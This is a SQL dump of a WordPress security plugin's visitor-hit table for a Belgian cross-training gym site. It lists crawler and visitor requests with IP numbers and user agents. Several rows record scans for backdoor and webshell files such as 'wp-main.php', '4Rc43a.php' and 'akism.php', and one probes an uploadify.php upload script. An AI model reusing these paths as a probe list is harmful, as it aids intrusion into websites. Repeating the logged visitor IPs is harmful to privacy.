(68906, 1491407291.737869, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36'),
(68907, 1491407292.462942, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/6.0 (compatible)'),
(68908, 1491407293.903206, 1381038492, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0'),
(68909, 1491416276.560741, 2763068977, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68910, 1491416277.352320, 2763068977, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68911, 1491417604.609956, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-main.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68912, 1491420478.776165, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68913, 1491423791.973523, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/theagency/includes/uploadify/uploadify.php', 'http://crosstrainingcenter.be/wp-content/themes/theagency/includes/uploadify/uploadify.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68914, 1491435265.054480, 3163187540, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css', '', 'Mozilla/5.0 (WordPress.com; http://support.wordpress.com/contact)'),
(68915, 1491435828.386002, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-cache.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68916, 1491438408.621761, 2637637534, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68917, 1491439593.793735, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68918, 1491439645.730992, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68919, 1491439970.597893, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68920, 1491440089.394809, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68921, 1491444719.402500, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68922, 1491451101.030727, 3475901904, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68923, 1491453116.996356, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68924, 1491453972.647446, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-tmp.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68925, 1491454650.847386, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68926, 1491459751.278173, 2637637534, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68927, 1491459751.948429, 2637637534, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68928, 1491459825.669187, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68929, 1491462394.364757, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68930, 1491466744.390296, 2637637522, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(68931, 1491471401.871032, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68932, 1491471402.339150, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68933, 1491472369.109203, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-upgrade.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68934, 1491473936.924479, 3024883464, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68935, 1491478482.134345, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/log.php', 'http://www.crosstrainingcenter.be/log.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68936, 1491481337.160690, 3104434436, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/dropbox-backup/template/js/admin-wpadm.js', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2921.56 Safari/537.36'),
(68937, 1491482485.949615, 3337640108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(68938, 1491484812.397928, 2870591764, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(68939, 1491484831.032564, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68940, 1491486139.112887, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68941, 1491490357.273361, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/4Rc43a.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68942, 1491490708.865722, 3024883604, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68943, 1491496865.972361, 3120584697, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(68944, 1491498716.221345, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68945, 1491503138.033982, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68946, 1491503138.573361, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68947, 1491506921.736168, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68948, 1491508434.647749, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/maill.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68949, 1491508728.165460, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68950, 1491514215.573209, 1439253603, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68951, 1491514216.755577, 1439253603, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68952, 1491514521.262216, 1538451905, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68953, 1491514523.118619, 1538451905, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68954, 1491514528.683666, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68955, 1491514537.517754, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68956, 1491514550.565191, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68957, 1491514575.915850, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68958, 1491518915.390170, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68959, 1491518923.841673, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68960, 1491519296.126215, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68961, 1491525930.218337, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68962, 1491525930.746345, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68963, 1491526540.240486, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/apache_pd2.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68964, 1491536763.798301, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68965, 1491541106.991563, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/admin-center.php', 'http://www.crosstrainingcenter.be/wp-admin/admin-center.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68966, 1491545130.797598, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/configurationbak.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68967, 1491547864.698269, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68968, 1491547865.134778, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68969, 1491550129.652446, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68970, 1491555141.720862, 2745986274, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/xmlparser.php', 'http://www.crosstrainingcenter.be/wp-includes/xmlparser.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68971, 1491555141.724348, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/akism.php', 'http://www.crosstrainingcenter.be/akism.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68972, 1491557087.552713, 2783008828, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68973, 1491557090.732657, 2783008828, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68974, 1491557100.202348, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68975, 1491557123.545756, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68976, 1491557131.262214, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68977, 1491560188.106401, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68978, 1491562966.033361, 3472744983, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68979, 1491562966.861388, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68980, 1491562971.463177, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68981, 1491562971.886553, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68982, 1491569142.850721, 3475901902, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68983, 1491572661.621215, 1123633959, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68984, 1491572662.108583, 1123633959, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68985, 1491581173.424766, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68986, 1491581277.894317, 1432072158, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjU58KZ3ZLTAhUlAsAKHYgIAvYQFgggMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ&bvm=bv.152174688,d.ZGg', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(68987, 1491581280.018316, 1432072158, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(68988, 1491581308.900667, 1432072158, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(68989, 1491581310.118052, 1432072158, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(68990, 1491581385.957115, 2521214213, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(68991, 1491581671.961455, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68992, 1491582503.335130, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68993, 1491582503.778082, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68994, 1491585258.527157, 2746007350, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(68995, 1491586942.603291, 1837490172, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68996, 1491586943.580647, 1837490172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68997, 1491587704.786736, 2996488257, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(68998, 1491587708.635330, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(68999, 1491592357.519111, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69000, 1491592358.079856, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69001, 1491592358.523064, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69002, 1491592359.095601, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69003, 1491592359.542256, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69004, 1491592360.041377, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69005, 1491592360.682949, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69006, 1491592361.270375, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69007, 1491592361.858334, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69008, 1491592362.281194, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69009, 1491592362.768577, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69010, 1491606242.002628, 2996488216, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69011, 1491606248.988667, 2366158608, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69012, 1491610697.572057, 876320311, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69013, 1491610698.289091, 876320311, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69014, 1491612367.380255, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69015, 1491621510.521228, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69016, 1491628681.796926, 3024883489, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69017, 1491628681.797894, 3024883473, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69018, 1491630411.907147, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69019, 1491645694.687418, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(69020, 1491651313.303069, 856633866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(69021, 1491651322.129896, 1534676261, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
